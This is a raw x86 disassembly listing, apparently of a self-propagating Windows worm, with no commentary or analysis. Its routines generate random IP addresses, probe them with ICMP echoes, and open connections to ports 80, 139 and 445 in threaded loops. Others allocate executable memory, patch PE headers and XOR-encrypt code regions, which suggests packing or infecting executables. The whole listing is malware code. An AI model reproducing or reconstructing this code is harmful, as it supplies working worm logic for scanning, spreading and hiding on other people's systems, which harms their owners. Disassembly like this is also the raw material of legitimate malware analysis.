push edi
push esi
push ebx
mov eax, [ebp+arg_0]
movzx ecx, byte ptr [eax+0Fh]
push ecx
movzx ecx, byte ptr [eax+0Eh]
push ecx
movzx ecx, byte ptr [eax+0Dh]
push ecx
movzx ecx, byte ptr [eax+0Ch]
push ecx
movzx ecx, byte ptr [eax+0Bh]
push ecx
movzx ecx, byte ptr [eax+0Ah]
push ecx
movzx ecx, byte ptr [eax+9]
push ecx
movzx ecx, byte ptr [eax+8]
push ecx
movzx ecx, word ptr [eax+6]
push ecx
movzx ecx, word ptr [eax+4]
push ecx
push dword ptr [eax]
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40A0F2
add esp, 34h
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_4048E0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404940 proc near ; CODE XREF: rdata:00404772�p
; rdata:0040479D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push 0
push 80h
push 4
push 0
push 3
push 40000000h
push [ebp+arg_0]
call sub_40A110
cmp eax, 0FFFFFFFFh
jz short loc_404992
mov [ebp+var_4], eax
push 0
push 0
push 0
push [ebp+var_4]
call sub_40A206
push 0
push esp
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_4]
call sub_40A242
push [ebp+var_4]
call sub_40A0FE
loc_404992: ; CODE XREF: sub_404940+26�j
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_404940 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049A0 proc near ; CODE XREF: rdata:00404696�p
var_2F4 = dword ptr -2F4h
var_2EE = byte ptr -2EEh
var_2BC = byte ptr -2BCh
var_258 = byte ptr -258h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFD0Ch
push edi
push esi
push ebx
mov [ebp+var_2F4], 0
push 0
push 64h
lea eax, [ebp+var_2BC]
push eax
call sub_40A3A4
push 0
push 12Ch
lea eax, [ebp+var_258]
push eax
call sub_40A3A4
push [ebp+arg_0]
lea eax, [ebp+var_258]
push eax
call sub_40A25A
mov edx, 64h
lea ecx, [ebp+var_258]
lea eax, [ebp+var_2EE]
push eax
call sub_40AF60
mov esi, 8
lea ebx, loc_414611+1
lea edi, [ebp+var_2BC]
jmp short loc_404A37
; ---------------------------------------------------------------------------
loc_404A12: ; CODE XREF: sub_4049A0+99�j
lea edx, [ebp+var_2EE]
mov eax, [ebp+var_2F4]
lea eax, [eax+edx]
mov eax, [eax]
xor edx, edx
mov ecx, 1Ah
div ecx
mov al, dl
xlat
stosb
dec esi
inc [ebp+var_2F4]
loc_404A37: ; CODE XREF: sub_4049A0+70�j
or esi, esi
jnz short loc_404A12
lea eax, [ebp+var_258]
push eax
call sub_40A266
lea edx, [ebp+var_258]
jmp short loc_404A50
; ---------------------------------------------------------------------------
loc_404A4F: ; CODE XREF: sub_4049A0+B4�j
dec eax
loc_404A50: ; CODE XREF: sub_4049A0+AD�j
cmp byte ptr [eax+edx], 5Ch
jnz short loc_404A4F
mov byte ptr [eax+edx+1], 0
lea eax, [ebp+var_2BC]
push eax
lea eax, [ebp+var_258]
push eax
push (offset loc_41463C+2)
push [ebp+arg_4]
call sub_40A0F2
add esp, 10h
pop ebx
pop esi
pop edi
leave
retn 8
sub_4049A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A80 proc near ; CODE XREF: rdata:004046B0�p
var_214 = byte ptr -214h
var_1F4 = byte ptr -1F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFDECh
push edi
push esi
push ebx
push 0
push 12Ch
lea eax, [ebp+var_1F4]
push eax
call sub_40A3A4
push [ebp+arg_0]
lea eax, [ebp+var_1F4]
push eax
call sub_40A25A
mov edx, 64h
lea ecx, [ebp+var_1F4]
lea eax, [ebp+var_214]
push eax
call sub_40AF60
push [ebp+arg_4]
push offset loc_414592
lea eax, [ebp+var_214]
push eax
call sub_4048E0
push [ebp+arg_8]
push offset loc_414557
lea eax, [ebp+var_214]
push eax
call sub_4048E0
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_404A80 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B00 proc near ; CODE XREF: rdata:004047BB�p
; sub_409C10+104�p
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFC0h
push edi
push esi
push ebx
mov [ebp+var_40], 0
mov esi, 10h
lea eax, [ebp+var_3C]
push eax
call sub_40A27E
lea ebx, loc_414611+1
mov edi, [ebp+arg_0]
jmp short loc_404B45
; ---------------------------------------------------------------------------
loc_404B29: ; CODE XREF: sub_404B00+47�j
lea edx, [ebp+var_3C]
mov eax, [ebp+var_40]
lea eax, [eax+edx]
mov eax, [eax]
xor edx, edx
mov ecx, 1Ah
div ecx
mov al, dl
xlat
stosb
dec esi
inc [ebp+var_40]
loc_404B45: ; CODE XREF: sub_404B00+27�j
or esi, esi
jnz short loc_404B29
pop ebx
pop esi
pop edi
leave
retn 4
sub_404B00 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
loc_404B59: ; CODE XREF: rdata:loc_404BB3�j
lea eax, [ebp-4]
push eax
push 1
push offset byte_414897
push 4027C0h
push 0
push 0
call sub_40A128
push eax
call sub_40A0FE
lea eax, [ebp-4]
push eax
push 1
push offset word_4148A6
push 4027C0h
push 0
push 0
call sub_40A128
push eax
call sub_40A0FE
push 32h
call sub_40A212
inc esi
cmp esi, 100h
jbe short loc_404BB3
push 1F4h
call sub_40A212
xor esi, esi
loc_404BB3: ; CODE XREF: rdata:00404BA5�j
jmp short loc_404B59
; ---------------------------------------------------------------------------
db 5Bh, 5Eh, 5Fh
dd 4C2C9h, 24648Dh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFD4h
push edi
push esi
push ebx
xor edi, edi
push dword ptr [ebp+8]
call sub_40A308
cmp eax, edi
jz loc_404C85
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp-2Ch], eax
push edi
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_404C85
mov [ebp-4], eax
mov dword ptr [ebp-18h], 1
lea eax, [ebp-18h]
push eax
push 8004667Eh
push dword ptr [ebp-4]
call sub_40A326
mov word ptr [ebp-14h], 2
mov esi, [ebp-2Ch]
mov [ebp-10h], esi
push 50h
call sub_40A314
mov [ebp-12h], ax
push 10h
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-4]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz short loc_404C7D
call sub_40A2F0
cmp eax, 2733h
jnz short loc_404C7C
mov dword ptr [ebp-20h], 6
mov [ebp-1Ch], edi
mov eax, [ebp-4]
mov dword ptr [ebp-28h], 1
mov [ebp-24h], eax
lea eax, [ebp-20h]
push eax
push edi
lea eax, [ebp-28h]
push eax
push edi
push edi
call sub_40A332
cmp eax, edi
jz short loc_404C7D
cmp eax, 0FFFFFFFFh
jz short loc_404C7D
inc edi
jmp short loc_404C7D
; ---------------------------------------------------------------------------
loc_404C7C: ; CODE XREF: rdata:00404C47�j
inc edi
loc_404C7D: ; CODE XREF: rdata:00404C3B�j
; rdata:00404C72�j ...
push dword ptr [ebp-4]
call sub_40A2FC
loc_404C85: ; CODE XREF: rdata:00404BD5�j
; rdata:00404BF2�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
dw 0FF8Bh
dd 345678B9h, 5678B812h, 0BA501234h, 12345678h, 2E8h, 3109EB00h
dd 4C08310h, 0C3F87549h, 345678B9h, 5678B812h, 78BA1234h
dd 0E8123456h, 0FFFFFFE3h
db 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CC5 proc near ; CODE XREF: rdata:00404785�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push edi
push esi
push ebx
mov [ebp+var_C], 0
push offset byte_4149F7
push 0
push 4
call sub_40A1E2
or eax, eax
jz loc_404DB0
mov [ebp+var_4], eax
push 0
push 0
push 0
push 4
push [ebp+var_4]
call sub_40A1DC
mov [ebp+var_8], eax
mov ecx, [eax]
mov [ebp+var_14], ecx
add eax, 4
mov edi, eax
push 40h
push 1000h
push [ebp+var_14]
push 0
call sub_40A22A
mov [ebp+var_10], eax
push [ebp+var_14]
push edi
push [ebp+var_10]
call sub_40F5BF
mov eax, [ebp+var_14]
mov dword_41BC5C, eax
mov eax, [ebp+var_10]
mov dword_41BC58, eax
mov dword_41BC50, offset dword_402890
mov ecx, offset byte_4028C5
sub ecx, offset dword_402890
mov dword_41BC4C, ecx
mov dword_41BC54, 70h
mov off_41BC40, 2
mov dword_41BC48, 0ED0h
push offset off_41BC40
call sub_404DC0
mov [ebp+var_C], eax
push 8000h
push 0
push [ebp+var_10]
call sub_40A230
push [ebp+var_8]
call sub_40A224
push [ebp+var_4]
call sub_40A0FE
mov ecx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [ecx], eax
mov ecx, [ebp+arg_4]
mov eax, [ebp+var_14]
mov [ecx], eax
loc_404DB0: ; CODE XREF: sub_404CC5+20�j
mov eax, [ebp+var_C]
pop ebx
pop esi
pop edi
leave
retn 8
sub_404CC5 endp
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404DC0 proc near ; CODE XREF: sub_404CC5+B4�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = byte ptr -26Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFD74h
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
push 40h
push 1000h
push dword ptr [ebx+1Ch]
push 0
call sub_40A22A
mov [ebp+var_28C], eax
push dword ptr [ebx+1Ch]
push dword ptr [ebx+18h]
push [ebp+var_28C]
call sub_40F5BF
lea eax, [ebp+var_26C]
push eax
call sub_40A27E
lea eax, [ebp+var_26C]
mov ecx, [eax]
mov [ebx+28h], ecx
mov [ebx+40h], ecx
mov ecx, [eax+4]
mov [ebx+34h], ecx
mov [ebx+4Ch], ecx
push [ebp+var_28C]
call sub_4106F0
mov esi, [ebp+var_28C]
add esi, [esi+3Ch]
mov eax, [esi+34h]
mov [ebp+var_270], eax
mov eax, [esi+28h]
mov [ebp+var_274], eax
mov eax, [ebx+34h]
shr eax, 1
mov [esi+8], eax
push [ebp+var_274]
push [ebp+var_28C]
call sub_404130
add eax, [ebx+8]
add eax, [ebp+var_28C]
mov [ebx+20h], eax
mov eax, [ebp+var_274]
add eax, [ebx+8]
add eax, [ebp+var_270]
mov [ebx+38h], eax
add esi, 0F8h
mov edi, [ebp+var_28C]
add edi, [esi+14h]
add edi, [esi+10h]
sub edi, 4
xor eax, eax
jmp short loc_404E93
; ---------------------------------------------------------------------------
loc_404E90: ; CODE XREF: sub_404DC0+D5�j
sub edi, 4
loc_404E93: ; CODE XREF: sub_404DC0+CE�j
cmp [edi], eax
jz short loc_404E90
add edi, 10h
mov [ebp+var_284], edi
push [ebp+var_274]
push [ebp+var_28C]
call sub_404130
mov edx, eax
add edx, [ebp+var_28C]
add edx, [ebx+8]
sub edi, edx
shr edi, 2
mov [ebx+24h], edi
mov [ebx+3Ch], edi
mov eax, [ebp+var_28C]
add eax, [esi+14h]
add eax, [esi+10h]
sub eax, [ebp+var_284]
mov [ebp+var_288], eax
add esi, 50h
mov eax, [ebp+var_270]
add eax, [esi+0Ch]
mov [ebx+44h], eax
push dword ptr [esi+0Ch]
push [ebp+var_28C]
call sub_404130
add eax, [ebp+var_28C]
mov [ebx+2Ch], eax
mov eax, [esi+10h]
shr eax, 2
mov [ebx+30h], eax
mov [ebx+48h], eax
push ebx
call sub_405030
int 3 ; Trap to Debugger
push offset dword_403000
lea eax, [ebp+var_27C]
push eax
lea eax, [ebp+var_280]
push eax
push dword ptr [ebx+0Ch]
push dword ptr [ebx+10h]
call sub_40FFD0
push [ebp+var_274]
push [ebp+var_28C]
call sub_404130
add eax, [ebp+var_28C]
mov ecx, [ebx+8]
sub ecx, [ebp+var_27C]
add eax, ecx
mov esi, [ebp+var_28C]
add esi, [esi+3Ch]
add [esi+28h], ecx
push [ebp+var_27C]
push [ebp+var_280]
push eax
call sub_40F5BF
mov dword ptr [esi+58h], 0
mov eax, [ebx+28h]
add eax, [ebx+40h]
xor edx, edx
mov ecx, [ebp+var_288]
sub ecx, [ebx+14h]
sub ecx, 10h
div ecx
push edx
push [ebp+var_28C]
call sub_4108B0
add eax, [ebp+var_284]
sub eax, [ebp+var_28C]
push eax
push [ebp+var_28C]
call sub_410840
lea eax, [ebx+20h]
push eax
call sub_405000
push [ebp+var_28C]
call sub_40FEC0
push 8000h
push 0
push [ebp+var_280]
call sub_40A230
mov eax, [ebp+var_28C]
pop ebx
pop esi
pop edi
leave
retn 4
sub_404DC0 endp
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
sub_404FF0 proc near ; CODE XREF: sub_405000+11�p
; sub_405000+1F�p
pusha
loc_404FF1: ; CODE XREF: sub_404FF0+7�j
xor [eax], edx
add eax, 4
dec ecx
jnz short loc_404FF1
popa
retn
sub_404FF0 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405000 proc near ; CODE XREF: sub_404DC0+1FB�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx]
mov ecx, [ebx+4]
mov edx, [ebx+8]
call sub_404FF0
mov eax, [ebx+0Ch]
mov ecx, [ebx+10h]
mov edx, [ebx+14h]
call sub_404FF0
pop ebx
pop esi
pop edi
leave
retn 4
sub_405000 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405030 proc near ; CODE XREF: sub_404DC0+152�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov edi, [ebx+10h]
mov eax, [ebx+3Ch]
mov [edi+1], eax
mov eax, [ebx+38h]
mov [edi+6], eax
mov eax, [ebx+40h]
mov [edi+0Ch], eax
mov eax, [ebx+48h]
mov [edi+21h], eax
mov eax, [ebx+44h]
mov [edi+26h], eax
mov eax, [ebx+4Ch]
mov [edi+2Bh], eax
pop ebx
pop esi
pop edi
leave
retn 4
sub_405030 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
push 0
call sub_41274B
push offset dword_41BCA4
call sub_4051C0
loc_40508A: ; CODE XREF: rdata:004050D7�j
push 31h
push offset byte_414A09
call sub_405190
shl eax, 18h
mov dword_41BC98, eax
lea eax, [ebp-4]
push eax
push 1
push dword ptr [ebp+8]
push 402ED0h
push 300h
push 0
call sub_40A128
mov [ebp-8], eax
push 0FFFFFFFFh
push dword ptr [ebp-8]
call sub_40A236
push dword ptr [ebp-8]
call sub_40A0FE
push 0EA60h
call sub_40A212
jmp short loc_40508A
; ---------------------------------------------------------------------------
db 68h, 0, 80h
dd 6A0000h, 0BCA435FFh, 45E80041h, 5B000051h, 0C2C95F5Eh
dd 0A48D0004h, 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405100 proc near ; CODE XREF: sub_408C10+FD�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call sub_40A110
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_405179
push 0
push [ebp+var_4]
call sub_40A176
mov ebx, eax
add eax, 3E8h
push 40h
push 1000h
push eax
push 0
call sub_40A22A
mov edi, eax
or eax, eax
jz short loc_405179
mov ecx, [ebp+arg_4]
mov [ecx], edi
push 0
push esp
push ebx
push edi
push [ebp+var_4]
call sub_40A1E8
push [ebp+var_4]
call sub_40A0FE
mov ecx, [ebp+arg_8]
mov [ecx], ebx
xor eax, eax
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_405179: ; CODE XREF: sub_405100+29�j
; sub_405100+4F�j
mov eax, 0FFFFFFFFh
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_405100 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405190 proc near ; CODE XREF: rdata:00405091�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push edi
push esi
push ebx
lea eax, [ebp+var_20]
push eax
call sub_40A27E
lea ecx, [ebp+var_20]
xor edx, edx
mov eax, [ecx+5]
mov ecx, [ebp+arg_4]
div ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [edx+eax]
pop ebx
pop esi
pop edi
leave
retn 8
sub_405190 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051C0 proc near ; CODE XREF: rdata:00405085�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push 40h
push 1000h
push 1FFFEh
push 0
call sub_40A22A
mov [ebp+var_4], eax
push 40h
push 1000h
push 1FFFEh
push 0
call sub_40A22A
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_405260
push [ebp+var_8]
call sub_4052A0
xor ebx, ebx
mov edi, [ebp+var_8]
mov esi, [ebp+var_4]
jmp short loc_405239
; ---------------------------------------------------------------------------
loc_405214: ; CODE XREF: sub_4051C0+7F�j
xor edx, edx
mov eax, [ebx+esi]
mov ecx, 0FFFFh
div ecx
shl edx, 1
movzx eax, word ptr [edx+edi]
mov ecx, ebx
shl ecx, 1
push ebp
movzx ebp, word ptr [ecx+edi]
mov [ecx+edi], ax
mov [edx+edi], bp
pop ebp
inc ebx
loc_405239: ; CODE XREF: sub_4051C0+52�j
cmp ebx, 0FFFFh
jnz short loc_405214
push 8000h
push 0
push [ebp+var_4]
call sub_40A230
pop ebx
pop esi
pop edi
leave
retn 4
sub_4051C0 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405260 proc near ; CODE XREF: sub_4051C0+3D�p
; sub_40FFD0+13�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call sub_40A2A2
push [ebp+arg_0]
push 1FFFEh
push [ebp+var_4]
call sub_40A2A8
push 0
push [ebp+var_4]
call sub_40A2AE
pop ebx
pop esi
pop edi
leave
retn 4
sub_405260 endp
; ---------------------------------------------------------------------------
dw 0FF8Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052A0 proc near ; CODE XREF: sub_4051C0+45�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
xor ebx, ebx
xor esi, esi
jmp short loc_4052B7
; ---------------------------------------------------------------------------
loc_4052AF: ; CODE XREF: sub_4052A0+1B�j
mov [esi+edi], bx
add esi, 2
inc ebx
loc_4052B7: ; CODE XREF: sub_4052A0+D�j
cmp bx, 0FFFFh
jnz short loc_4052AF
pop ebx
pop esi
pop edi
leave
retn 4
sub_4052A0 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFF28h
push edi
push esi
push ebx
push ebp
push esp
push offset dword_403048
push offset byte_40741D
push large dword ptr fs:0
mov large fs:0, esp
mov dword ptr [ebp-0D8h], 0
mov dword_41BC90, 0
mov dword_41BCA0, 0
mov dword_41BC94, 0
call sub_40A1A0
xor edx, edx
mov ecx, 0FFh
div ecx
movzx ecx, dl
shl ecx, 10h
mov dword_41BC9C, ecx
jmp loc_4053F7
; ---------------------------------------------------------------------------
loc_40533D: ; CODE XREF: rdata:00405401�j
jmp short loc_405349
; ---------------------------------------------------------------------------
loc_40533F: ; CODE XREF: rdata:00405350�j
push 2710h
call sub_40A212
loc_405349: ; CODE XREF: rdata:loc_40533D�j
cmp dword_41BCBC, 0
jnz short loc_40533F
mov ecx, dword_41BC94
mov edx, dword_41BCA4
shl ecx, 1
movzx esi, word ptr [edx+ecx]
or esi, dword_41BC98
or esi, dword_41BC9C
push offset dword_41BC94
call sub_40A1B8
bswap esi
mov dword_41B37A, esi
lea eax, [ebp-4]
push eax
push 4
push dword_41B37A
push offset aIsProgramCanno ; "is program cannot be run in DOS mode.\r\r"...
push 500h
push 0
call sub_40A128
or eax, eax
jnz short loc_4053A8
call sub_40A17C
loc_4053A8: ; CODE XREF: rdata:004053A1�j
mov [ebp-0D4h], eax
push dword ptr [ebp-0D4h]
call sub_40A1EE
push dword ptr [ebp-0D4h]
call sub_40A0FE
push 14h
call sub_40A212
jmp short loc_4053D7
; ---------------------------------------------------------------------------
loc_4053CD: ; CODE XREF: rdata:004053DE�j
push 1770h
call sub_40A212
loc_4053D7: ; CODE XREF: rdata:004053CB�j
cmp dword_41BC90, 32h
ja short loc_4053CD
cmp dword_41BC94, 8000h
jbe short loc_4053F7
cmp dword_41BCA0, 50h
jnb short loc_4053F7
jmp short loc_405407
; ---------------------------------------------------------------------------
loc_4053F7: ; CODE XREF: rdata:00405338�j
; rdata:004053EA�j ...
cmp dword_41BC94, 0FFF8h
jb loc_40533D
loc_405407: ; CODE XREF: rdata:004053F5�j
pop large dword ptr fs:0
add esp, 10h
mov dword ptr [ebp-0D0h], 0
jmp short loc_405438
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: rdata:0040543F�j
push 2710h
call sub_40A212
inc dword ptr [ebp-0D0h]
cmp dword ptr [ebp-0D0h], 6
jbe short loc_405438
jmp short loc_405441
; ---------------------------------------------------------------------------
loc_405438: ; CODE XREF: rdata:0040541B�j
; rdata:00405434�j
cmp dword_41BC90, 0
ja short loc_40541D
loc_405441: ; CODE XREF: rdata:00405436�j
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
dd 0F1E8006Ah, 9000004Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFA0h
push edi
push esi
push ebx
push ebp
push esp
push offset word_4032B2
push offset byte_40745D
push large dword ptr fs:0
mov large fs:0, esp
mov dword ptr [ebp-50h], 0
mov dword ptr [ebp-58h], 0
push dword ptr [ebp+8]
pop dword ptr [ebp-28h]
push dword ptr [ebp-28h]
call sub_4056D0
or eax, eax
jnz loc_4056B2
push offset dword_41BC90
call sub_40A1B8
push 0
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_405599
mov [ebp-60h], eax
mov dword ptr [ebp-14h], 1
lea eax, [ebp-14h]
push eax
push 8004667Eh
push dword ptr [ebp-60h]
call sub_40A326
mov word ptr [ebp-5Ch], 1
mov word ptr [ebp-5Ah], 0
push 4
lea eax, [ebp-5Ch]
push eax
push 80h
push 0FFFFh
push dword ptr [ebp-60h]
call sub_40A33E
mov word ptr [ebp-10h], 2
mov eax, [ebp-28h]
mov [ebp-0Ch], eax
push 8Bh
call sub_40A314
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-60h]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz short loc_40558B
call sub_40A2F0
cmp eax, 2733h
jnz short loc_405591
mov dword ptr [ebp-1Ch], 6
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-24h], 1
mov eax, [ebp-60h]
mov [ebp-20h], eax
lea eax, [ebp-1Ch]
push eax
push 0
lea eax, [ebp-24h]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz short loc_405589
cmp eax, 0FFFFFFFFh
jz short loc_405589
loc_405564: ; CODE XREF: rdata:0040558F�j
push offset dword_41BCA0
call sub_40A1B8
mov dword ptr [ebp-58h], 8Bh
mov dword ptr [ebp-50h], 1
push dword ptr [ebp-60h]
call sub_40A2FC
jmp loc_405684
; ---------------------------------------------------------------------------
loc_405589: ; CODE XREF: rdata:0040555D�j
; rdata:00405562�j
jmp short loc_405591
; ---------------------------------------------------------------------------
loc_40558B: ; CODE XREF: rdata:0040551F�j
or eax, eax
jnz short loc_405591
jmp short loc_405564
; ---------------------------------------------------------------------------
loc_405591: ; CODE XREF: rdata:0040552B�j
; rdata:loc_405589�j ...
push dword ptr [ebp-60h]
call sub_40A2FC
loc_405599: ; CODE XREF: rdata:004054AF�j
push 0
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_405684
mov [ebp-60h], eax
mov dword ptr [ebp-14h], 1
lea eax, [ebp-14h]
push eax
push 8004667Eh
push dword ptr [ebp-60h]
call sub_40A326
mov word ptr [ebp-5Ch], 1
mov word ptr [ebp-5Ah], 0
push 4
lea eax, [ebp-5Ch]
push eax
push 80h
push 0FFFFh
push dword ptr [ebp-60h]
call sub_40A33E
mov word ptr [ebp-10h], 2
mov eax, [ebp-28h]
mov [ebp-0Ch], eax
push 1BDh
call sub_40A314
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-60h]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz short loc_405676
call sub_40A2F0
cmp eax, 2733h
jnz short loc_40567C
mov dword ptr [ebp-1Ch], 6
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-24h], 1
mov eax, [ebp-60h]
mov [ebp-20h], eax
lea eax, [ebp-1Ch]
push eax
push 0
lea eax, [ebp-24h]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz short loc_405674
cmp eax, 0FFFFFFFFh
jz short loc_405674
loc_40565C: ; CODE XREF: rdata:0040567A�j
push offset dword_41BCA0
call sub_40A1B8
mov dword ptr [ebp-58h], 1BDh
mov dword ptr [ebp-50h], 1
loc_405674: ; CODE XREF: rdata:00405655�j
; rdata:0040565A�j
jmp short loc_40567C
; ---------------------------------------------------------------------------
loc_405676: ; CODE XREF: rdata:00405617�j
or eax, eax
jnz short loc_40567C
jmp short loc_40565C
; ---------------------------------------------------------------------------
loc_40567C: ; CODE XREF: rdata:00405623�j
; rdata:loc_405674�j ...
push dword ptr [ebp-60h]
call sub_40A2FC
loc_405684: ; CODE XREF: rdata:00405584�j
; rdata:004055A7�j
cmp dword ptr [ebp-50h], 1
jnz short loc_405692
push dword ptr [ebp-28h]
call sub_408DC0
loc_405692: ; CODE XREF: rdata:00405688�j
push offset dword_41BC90
call sub_40A1B2
cmp dword_41BC90, 0FF000000h
jbe short loc_4056B2
mov dword_41BC90, 0
loc_4056B2: ; CODE XREF: rdata:00405491�j
; rdata:004056A6�j
pop large dword ptr fs:0
add esp, 10h
push 0
call sub_40A140
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056D0 proc near ; CODE XREF: rdata:0040548A�p
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_68 = byte ptr -68h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFF64h
push edi
push esi
push ebx
cmp dword_41BCB8, 0
jz loc_4057A6
call dword_41BCA8
mov [ebp+var_9C], eax
cmp [ebp+var_9C], 0
jz loc_4057A2
mov [ebp+var_94], 0FFFFFFFFh
push offset word_414A92
lea eax, [ebp+var_90]
push eax
call sub_40A25A
mov edi, [ebp+arg_0]
mov [ebp+var_98], 2
jmp short loc_405785
; ---------------------------------------------------------------------------
loc_40572C: ; CODE XREF: sub_4056D0+BC�j
lea eax, [ebp+var_90]
push eax
call sub_40A266
mov ebx, eax
lea ecx, [ebp+var_68]
lea edx, [ebp+var_90]
push 7D0h
push 64h
push ecx
push 0
push ebx
push edx
push edi
push [ebp+var_9C]
call dword_41BCAC
or eax, eax
jz short loc_40577F
lea ecx, [ebp+var_68]
push 64h
push ecx
call dword_41BCB0
lea ebx, [ebp+var_68]
